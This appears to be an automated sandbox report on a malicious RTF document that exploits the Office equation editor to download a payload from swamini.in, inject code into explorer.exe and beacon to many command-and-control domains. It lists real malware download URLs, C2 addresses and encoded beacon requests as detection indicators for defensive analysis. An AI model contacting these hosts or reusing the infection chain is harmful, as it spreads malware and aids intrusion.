          Masquerading          		LSA Secrets141
          Security Software Discovery          		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
          Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Modify Registry          		Cached Domain Credentials2
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
          External Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Virtualization/Sandbox Evasion          		DCSync2
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
          Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job512
          Process Injection          		Proc Filesystem1
          Application Window Discovery          		Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
          Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          Remote System Discovery          		Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1345774 Sample: SecuriteInfo.com.RTF.Obfusc... Startdate: 21/11/2023 Architecture: WINDOWS Score: 100 58 Snort IDS alert for network traffic 2->58 60 Multi AV Scanner detection for domain / URL 2->60 62 Found malware configuration 2->62 64 12 other signatures 2->64 11 EQNEDT32.EXE 12 2->11         started        16 WINWORD.EXE 336 13 2->16         started        18 EQNEDT32.EXE 2->18         started        process3 dnsIp4 44 swamini.in 103.224.247.210, 443, 49161, 49162 WEBWERKS-ASWebWerksIndiaPvtLtdIN India 11->44 40 C:\Users\user\AppData\Roaming\word.exe, PE32 11->40 dropped 42 C:\Users\user\AppData\...\balokarat2.1[1].exe, PE32 11->42 dropped 82 Office equation editor establishes network connection 11->82 84 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->84 20 word.exe 17 11->20         started        file5 signatures6 process7 file8 38 C:\Users\user\AppData\Local\...\twbcaze.exe, PE32 20->38 dropped 23 twbcaze.exe 20->23         started        process9 signatures10 66 Detected unpacking (changes PE section rights) 23->66 68 Machine Learning detection for dropped file 23->68 70 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 23->70 72 2 other signatures 23->72 26 twbcaze.exe 23->26         started        process11 signatures12 74 Modifies the context of a thread in another process (thread injection) 26->74 76 Maps a DLL or memory area into another process 26->76 78 Sample uses process hollowing technique 26->78 80 Queues an APC in another process (thread injection) 26->80 29 explorer.exe 1 3 26->29 injected process13 dnsIp14 46 www.xazeyu.net 103.150.181.71, 49167, 80 NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN unknown 29->46 48 www.shucaimh.com 107.164.111.101, 49165, 80 EGIHOSTINGUS United States 29->48 50 3 other IPs or domains 29->50 86 System process connects to network (likely due to code injection or exploit) 29->86 33 cmstp.exe 29->33         started        signatures15 process16 signatures17 52 Modifies the context of a thread in another process (thread injection) 33->52 54 Maps a DLL or memory area into another process 33->54 56 Tries to detect virtualization through RDTSC time measurements 33->56 36 cmd.exe 33->36         started        process18

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf49%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
          SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf55%VirustotalBrowse
          SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf100%AviraHEUR/Rtf.Malformed

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\twbcaze.exe100%Joe Sandbox ML

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          6061k.vip0%VirustotalBrowse
          www.xazeyu.net0%VirustotalBrowse
          swamini.in19%VirustotalBrowse
          www.shucaimh.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://ocsp.entrust.net030%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          http://ocsp.entrust.net0D0%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
          http://www.techsterverse.lifeReferer:0%Avira URL Cloudsafe
          http://www.janenas.top/t2ti/100%Avira URL Cloudphishing
          http://www.allamericanshuttlellc.com0%Avira URL Cloudsafe
          http://www.spacecargo.net0%Avira URL Cloudsafe
          http://www.albertcolet.com/t2ti/100%Avira URL Cloudmalware
          http://www.xazeyu.net/t2ti/100%Avira URL Cloudmalware
          http://www.janenas.top/t2ti/1%VirustotalBrowse
          http://www.hhmhhhbh.xyz100%Avira URL Cloudmalware
          http://www.xazeyu.net/t2ti/2%VirustotalBrowse
          http://www.maquibotanic.com/t2ti/100%Avira URL Cloudmalware
          http://www.spacecargo.net1%VirustotalBrowse
          http://www.hhmhhhbh.xyz/t2ti/www.techsterverse.life100%Avira URL Cloudphishing
          http://www.xazeyu.net/t2ti/www.fxzx01.icu100%Avira URL Cloudmalware
          http://www.hhmhhhbh.xyz1%VirustotalBrowse
          http://www.6061k.vip/t2ti/?ll=NdqLMf&4hO02rc=qDIrkJK7+k7t2cKm0yqLDiQOFM/oPqsB85v8vrvlTOlWprVZbJOF5qoRsr2uTLTXyB6S3g==100%Avira URL Cloudmalware
          http://www.mozilla.com00%Avira URL Cloudsafe
          http://crl.use0%Avira URL Cloudsafe
          http://www.shucaimh.com/t2ti/www.6061k.vip100%Avira URL Cloudmalware
          http://www.michealwilshire.onlineReferer:0%Avira URL Cloudsafe
          http://www.shucaimh.comReferer:0%Avira URL Cloudsafe
          http://www.michealwilshire.online0%Avira URL Cloudsafe
          http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe100%Avira URL Cloudmalware
          http://www.janenas.top/t2ti/www.alishopogolic.com100%Avira URL Cloudphishing
          http://www.www32561b.com0%Avira URL Cloudsafe
          http://www.guimisha.com0%Avira URL Cloudsafe
          http://www.allamericanshuttlellc.com/t2ti/100%Avira URL Cloudmalware
          http://www.michealwilshire.online0%VirustotalBrowse
          http://www.shucaimh.com/t2ti/?4hO02rc=giwc8XVj/AkHwdj5caWP9R2rVnZav6a8h1CJcH9em0U/x824OxogtA/AOr9gMChFXFyvXA==&ll=NdqLMf100%Avira URL Cloudmalware
          http://www.6061k.vip/t2ti/100%Avira URL Cloudmalware
          http://www.www32561b.com0%VirustotalBrowse
          http://www.albertcolet.com/t2ti/www.guimisha.com100%Avira URL Cloudmalware
          http://www.6061k.vip/t2ti/www.xazeyu.net100%Avira URL Cloudmalware
          https://swamini.in/100%Avira URL Cloudmalware
          http://www.guimisha.com0%VirustotalBrowse
          http://www.ssongg10292.cfdReferer:0%Avira URL Cloudsafe
          http://www.6061k.vip/t2ti/2%VirustotalBrowse
          http://www.techsterverse.life/t2ti/www.www32561b.com100%Avira URL Cloudmalware
          http://www.guimisha.com/t2ti/www.ssongg10292.cfd100%Avira URL Cloudmalware
          https://swamini.in/14%VirustotalBrowse
          http://www.hhmhhhbh.xyz/t2ti/100%Avira URL Cloudphishing
          http://www.shucaimh.com0%Avira URL Cloudsafe
          http://www.fxzx01.icuReferer:0%Avira URL Cloudsafe
          http://www.ssongg10292.cfd0%Avira URL Cloudsafe
          https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeqqC:100%Avira URL Cloudmalware
          http://www.spacecargo.net/t2ti/www.michealwilshire.online100%Avira URL Cloudmalware
          http://www.shucaimh.com1%VirustotalBrowse
          http://www.alishopogolic.com/t2ti/100%Avira URL Cloudmalware
          http://www.guimisha.com/t2ti/100%Avira URL Cloudmalware
          http://www.hhmhhhbh.xyz/t2ti/3%VirustotalBrowse
          http://www.hhmhhhbh.xyzReferer:0%Avira URL Cloudsafe
          https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeemC:100%Avira URL Cloudmalware
          http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exej100%Avira URL Cloudmalware
          https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe100%Avira URL Cloudmalware
          http://www.michealwilshire.online/t2ti/www.janenas.top100%Avira URL Cloudmalware
          http://www.allamericanshuttlellc.comReferer:0%Avira URL Cloudsafe
          http://www.guimisha.com/t2ti/2%VirustotalBrowse
          http://www.maquibotanic.com0%Avira URL Cloudsafe
          http://www.janenas.topReferer:0%Avira URL Cloudsafe
          http://www.6061k.vipReferer:0%Avira URL Cloudsafe
          http://www.www32561b.com/t2ti/100%Avira URL Cloudmalware
          http://www.xazeyu.net0%Avira URL Cloudsafe
          http://www.albertcolet.com0%Avira URL Cloudsafe
          http://www.fxzx01.icu/t2ti/100%Avira URL Cloudmalware
          http://www.maquibotanic.com1%VirustotalBrowse
          http://www.spacecargo.netReferer:0%Avira URL Cloudsafe
          www.guimisha.com/t2ti/100%Avira URL Cloudmalware
          http://www.techsterverse.life/t2ti/100%Avira URL Cloudmalware
          http://www.www32561b.com/t2ti/2%VirustotalBrowse
          http://www.xazeyu.netReferer:0%Avira URL Cloudsafe
          http://www.fxzx01.icu/t2ti/1%VirustotalBrowse
          http://www.shucaimh.com/t2ti/100%Avira URL Cloudmalware
          http://www.fxzx01.icu/t2ti/www.albertcolet.com100%Avira URL Cloudmalware
          http://www.xazeyu.net0%VirustotalBrowse
          http://java.sun.com0%Avira URL Cloudsafe
          www.guimisha.com/t2ti/2%VirustotalBrowse
          http://www.techsterverse.life/t2ti/2%VirustotalBrowse
          http://www.www32561b.com/t2ti/www.spacecargo.net100%Avira URL Cloudmalware
          http://www.spacecargo.net/t2ti/100%Avira URL Cloudmalware
          http://java.sun.com0%VirustotalBrowse
          http://www.albertcolet.comReferer:0%Avira URL Cloudsafe
          http://www.spacecargo.net/t2ti/2%VirustotalBrowse
          http://www.janenas.top0%VirustotalBrowse
          http://www.6061k.vip0%Avira URL Cloudsafe
          http://www.alishopogolic.comReferer:0%Avira URL Cloudsafe
          http://www.maquibotanic.comReferer:0%Avira URL Cloudsafe
          http://www.janenas.top0%Avira URL Cloudsafe
          http://www.techsterverse.life0%Avira URL Cloudsafe
          http://www.alishopogolic.com/t2ti/www.maquibotanic.com100%Avira URL Cloudmalware
          http://www.guimisha.comReferer:0%Avira URL Cloudsafe
          http://www.allamericanshuttlellc.com/t2ti/www.shucaimh.com100%Avira URL Cloudmalware
          http://www.michealwilshire.online/t2ti/100%Avira URL Cloudmalware
          http://www.www32561b.comReferer:0%Avira URL Cloudsafe
          http://www.ssongg10292.cfd/t2ti/100%Avira URL Cloudmalware
          http://www.alishopogolic.com0%Avira URL Cloudsafe
          http://www.fxzx01.icu0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          6061k.vip
          		3.33.130.190
          		truetrueunknown
          www.xazeyu.net
          		103.150.181.71
          		truetrueunknown
          swamini.in
          		103.224.247.210
          		truetrueunknown
          www.shucaimh.com
          		107.164.111.101
          		truetrueunknown
          www.allamericanshuttlellc.com
          		unknown
          		unknowntrue
            		unknown
            www.6061k.vip
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.6061k.vip/t2ti/?ll=NdqLMf&4hO02rc=qDIrkJK7+k7t2cKm0yqLDiQOFM/oPqsB85v8vrvlTOlWprVZbJOF5qoRsr2uTLTXyB6S3g==true
              • Avira URL Cloud: malware
              		unknown
              http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exetrue
              • Avira URL Cloud: malware
              		unknown
              http://www.shucaimh.com/t2ti/?4hO02rc=giwc8XVj/AkHwdj5caWP9R2rVnZav6a8h1CJcH9em0U/x824OxogtA/AOr9gMChFXFyvXA==&ll=NdqLMftrue
              • Avira URL Cloud: malware
              		unknown
              https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exetrue
              • Avira URL Cloud: malware
              		unknown
              www.guimisha.com/t2ti/true
              • 2%, Virustotal, Browse
              • Avira URL Cloud: malware
              		low

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.techsterverse.lifeReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.janenas.top/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmptrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: phishing
              		unknown
              http://www.albertcolet.com/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              		unknown
              http://www.spacecargo.netexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.allamericanshuttlellc.comexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.xazeyu.net/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://www.hhmhhhbh.xyzexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://www.maquibotanic.com/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.hhmhhhbh.xyz/t2ti/www.techsterverse.lifeexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              		unknown
              http://www.xazeyu.net/t2ti/www.fxzx01.icuexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://crl.useEQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.mozilla.com0explorer.exe, 00000008.00000000.355385878.0000000005E08000.00000004.00000010.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.shucaimh.com/t2ti/www.6061k.vipexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.michealwilshire.onlineReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.shucaimh.comReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.michealwilshire.onlineexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://push.zhanzhang.baidu.com/push.jsexplorer.exe, 00000008.00000002.881102573.000000000891F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.879666706.000000000293F000.00000004.10000000.00040000.00000000.sdmpfalse
                		high
                http://www.janenas.top/t2ti/www.alishopogolic.comexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                		unknown
                http://www.www32561b.comexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.guimisha.comexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.allamericanshuttlellc.com/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://www.6061k.vip/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://www.albertcolet.com/t2ti/www.guimisha.comexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://www.6061k.vip/t2ti/www.xazeyu.netexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://swamini.in/EQNEDT32.EXE, 00000002.00000002.354183793.00000000002E5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354079033.00000000002E5000.00000004.00000020.00020000.00000000.sdmpfalse
                • 14%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://www.ssongg10292.cfdReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.techsterverse.life/t2ti/www.www32561b.comexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://www.guimisha.com/t2ti/www.ssongg10292.cfdexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://www.hhmhhhbh.xyz/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                • 3%, Virustotal, Browse
                • Avira URL Cloud: phishing
                		unknown
                http://www.shucaimh.comexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.fxzx01.icuReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.ssongg10292.cfdexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeqqC:EQNEDT32.EXE, 00000002.00000002.354164250.000000000028F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://www.autoitscript.com/autoit3explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://www.spacecargo.net/t2ti/www.michealwilshire.onlineexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.alishopogolic.com/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.guimisha.com/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.hhmhhhbh.xyzReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeemC:EQNEDT32.EXE, 00000002.00000003.353995693.0000000000357000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exejEQNEDT32.EXE, 00000002.00000002.354164250.000000000028F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.michealwilshire.online/t2ti/www.janenas.topexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.piriform.com/ccleanerxeexplorer.exe, 00000008.00000002.879757216.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354257988.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    http://www.allamericanshuttlellc.comReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.maquibotanic.comexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://www.janenas.topReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.6061k.vipReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.piriform.com/ccleanerhttp://explorer.exe, 00000008.00000002.880897164.00000000078DF000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://www.www32561b.com/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        https://zz.bdstatic.com/linksubmit/push.jsexplorer.exe, 00000008.00000002.881102573.000000000891F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.879666706.000000000293F000.00000004.10000000.00040000.00000000.sdmpfalse
                          		high
                          http://www.xazeyu.netexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.albertcolet.comexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fxzx01.icu/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.spacecargo.netReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://nsis.sf.net/NSIS_ErrorErrorEQNEDT32.EXE, 00000002.00000003.353995693.0000000000357000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000005.00000000.351583902.0000000000409000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp, balokarat2.1[1].exe.2.dr, word.exe.2.drfalse
                            		high
                            http://www.techsterverse.life/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.xazeyu.netReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.shucaimh.com/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.fxzx01.icu/t2ti/www.albertcolet.comexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://java.sun.comexplorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.www32561b.com/t2ti/www.spacecargo.netexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.spacecargo.net/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            		unknown
                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://nsis.sf.net/NSIS_Errorword.exe, word.exe, 00000005.00000000.351583902.0000000000409000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp, balokarat2.1[1].exe.2.dr, word.exe.2.drfalse
                              		high
                              http://www.6061k.vipexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.janenas.topexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.356321404.0000000007968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.0000000007997000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879757216.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.000000000795D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354623320.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.356321404.00000000078DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880167411.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354257988.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://www.albertcolet.comReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.alishopogolic.comReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.maquibotanic.comReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.techsterverse.lifeexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
